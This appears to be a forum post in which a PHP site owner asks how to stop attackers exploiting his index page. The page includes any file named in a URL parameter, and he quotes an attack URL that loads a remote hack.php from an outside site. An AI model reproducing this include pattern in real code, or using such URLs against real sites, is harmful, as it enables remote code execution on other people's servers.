Dear Jayanth Kumar
Still, I didn't understand this...
In the index.php, I use the following script for invoking files
<? if (isset($file))
{include("$file");}
else {include("body/home.php");} ?>
And I use the navigation like this for different links.
<a href="<?php print"index.php?file=body/file1.php";?>">Click Here</a>
<a href="<?php print"index.php?file=body/file2.php";?>">Click Here</a>
Now in the address bar it appears like this for each navigation,
index.php?file=body/file1.php
index.php?file=body/file2.php
And the hacker runs script from his site like this
index.php?file=http://somesite.com/hack.php
Now how do I solve this problem.
Thanks
Rajkumar